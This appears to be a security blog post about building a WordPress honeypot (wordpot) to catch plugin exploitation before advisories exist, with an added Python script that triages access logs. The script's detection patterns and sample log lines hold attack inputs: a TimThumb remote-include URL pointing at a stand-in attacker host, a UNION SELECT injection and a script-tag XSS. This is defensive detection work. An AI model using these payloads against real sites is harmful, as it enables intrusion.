
Hunting WordPress Exploitation in the Wild

A thing I noticed working day by day on WPScan's vulnerability database is that the WordPress plugin vulns actually disclosed are far fewer than the plugins that are actually exploitable. A quick trip to the official directory and a little browsing of the SVN repositories will turn up a lot of trivial bugs that might be worth an advisory. I am talking about low-hanging fruit like unsophisticated XSS and basic SQLi.

For example, some time ago Ryan and I were debunking a fake advisory and found a bunch of XSS bugs in the very same plugin just by running DevBug (which was not even optimized for WordPress code). There is a gold mine of easy bugs down there.

The hassle is that properly disclosing a vuln takes a lot of time: you have to find it, test it, warn the author, warn Automattic, and publish an advisory. With an unresponsive author it may take up to a month, and meanwhile a horde of new plugins gets published. We can't keep up, and most of the time it's not worth it.

And what if down in the mine there is a true gem nobody knows about yet? What if it's found first by someone with malicious intent? That's the problem: a vuln exploited before any advisory exists. And WPScan relies on advisories as its main source of data. You do the math.

Having fresh data is crucial: from a defensive standpoint the average WordPress user should care far more about actively exploited vulns than about random bugs in their installed plugins. In the end, if a vulnerability is not being exploited it's not a real menace (just a potential one). For example, I personally find it telling how regularly a vulnerable timthumb file turns up inside a plugin and a wave of in-the-wild exploitation follows.

To catch those attacks the approach is standard: honeypots.

This is probably also how commercial appsec vendors like SpiderLabs and Sucuri detect attacks. SpiderLabs seems to have a web app honeypot (general purpose? WordPress-specific?), while Sucuri might just monitor their clients' WordPress installations, since they seem to have a large WordPress-centric user base.

I am just speculating, since nobody is kind enough to share their secrets. The best tool available so far is Glastopf, which is general-purpose and of little use in our case.

So, to cope with the lack of proper tools, I've built a WordPress honeypot from scratch in the hope of catching some exploitation and providing the WPScan project with fresh data. It's called wordpot and is public domain.
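As an added example (not wordpot's own code, and not a description of how wordpot works internally), here is the kind of triage a WordPress honeypot's access log needs once traffic comes in: parse combined-format lines, attribute each request to the plugin or theme directory it targets, and tag the patterns this post is after (a TimThumb `src=` pointing at a remote host, `readme.txt` version probes, basic SQLi and XSS payloads, login brute-forcing). The log lines, the category names and the small pattern lists are all constructed for the example.

```python
"""Triage web-server log lines from a WordPress-looking host into
exploitation-attempt categories.

Added example, not wordpot's own code. The log lines at the bottom are
constructed and the pattern lists are deliberately small.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format as written by Apache/nginx.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Plugins and themes live here; group 2 is the component directory name.
COMPONENT_RE = re.compile(r'^/wp-content/(plugins|themes)/([^/]+)/(.*)$')
# Files attackers request to fingerprint a plugin or theme version.
PROBE_FILES = {'readme.txt', 'readme.html', 'changelog.txt', 'style.css'}
# TimThumb shipped under these names; its src= parameter was the RFI vector.
TIMTHUMB_NAMES = {'timthumb.php', 'thumb.php'}
# Assumed, minimal payload patterns (a real honeypot would use far more).
SQLI_RE = re.compile(r"(?i)(union\s+select|'\s*or\s+|sleep\s*\(|benchmark\s*\(|information_schema)")
XSS_RE = re.compile(r'(?i)(<script|javascript:|\bon\w+\s*=)')


def parse_log_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.groupdict()
    url = urlsplit(req['target'])
    req['path'] = url.path
    # parse_qs percent-decodes, so the pattern checks see the real payload.
    req['query'] = parse_qs(url.query, keep_blank_values=True)
    return req


def is_remote_url(value):
    """True when the parameter value names another host (absolute or scheme-relative)."""
    if value.startswith('//'):
        return True
    try:
        return urlsplit(value).scheme in ('http', 'https', 'ftp')
    except ValueError:  # e.g. malformed IPv6 literal in the value
        return False


def classify(req):
    """Return (component, tags) for one parsed request; component is the plugin
    or theme directory name, or None for paths outside wp-content."""
    tags = []
    path = req['path']
    basename = path.rsplit('/', 1)[-1].lower()
    component = None
    m = COMPONENT_RE.match(path)
    if m:
        component = m.group(2)
        if basename in PROBE_FILES:
            tags.append('version_probe')
    values = [v for vs in req['query'].values() for v in vs]
    if basename in TIMTHUMB_NAMES and any(is_remote_url(v) for v in values):
        tags.append('timthumb_rfi')
    if any(SQLI_RE.search(v) for v in values):
        tags.append('sqli')
    if any(XSS_RE.search(v) for v in values):
        tags.append('xss')
    if req['method'] == 'POST' and path == '/wp-login.php':
        tags.append('login_attempt')
    if req['method'] == 'POST' and path == '/xmlrpc.php':
        tags.append('xmlrpc_post')
    return component, tags


def hunt(lines):
    """Parse and classify lines; return only the requests that got a tag."""
    findings = []
    for line in lines:
        req = parse_log_line(line)
        if req is None:
            continue
        component, tags = classify(req)
        if tags:
            findings.append({'ip': req['ip'], 'path': req['path'],
                             'component': component, 'tags': tags})
    return findings


# Constructed sample traffic (RFC 5737 addresses, invented plugin names); not real data.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Sep/2012:10:01:02 +0000] "GET /wp-content/themes/sometheme/timthumb.php?src=http://blogger.com.evil.example/x.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Sep/2012:10:01:03 +0000] "GET /wp-content/plugins/foo-gallery/readme.txt HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '198.51.100.3 - - [12/Sep/2012:10:02:10 +0000] "GET /wp-content/plugins/foo-gallery/view.php?id=1%27%20UNION%20SELECT%201,2,3-- HTTP/1.1" 200 100 "-" "sqlmap/1.0"',
    '198.51.100.3 - - [12/Sep/2012:10:02:11 +0000] "GET /?s=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [12/Sep/2012:10:03:00 +0000] "POST /wp-login.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [12/Sep/2012:10:03:01 +0000] "GET /wp-content/uploads/2012/09/cat.jpg HTTP/1.1" 200 8000 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for f in hunt(SAMPLE_LOG):
        print(f['ip'], f['component'], ','.join(f['tags']), f['path'])
```

Run as a script it prints the five tagged requests and drops the benign image fetch. In a honeypot the component name is the interesting column: the same plugin or theme directory showing up across many source IPs in a short window is exactly the "wave of exploitation" that should send someone to read that plugin's code before an advisory exists.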

If you were thinking about contributing to WPScan in one way or another, starting now you can also help by installing wordpot and letting us know how it goes.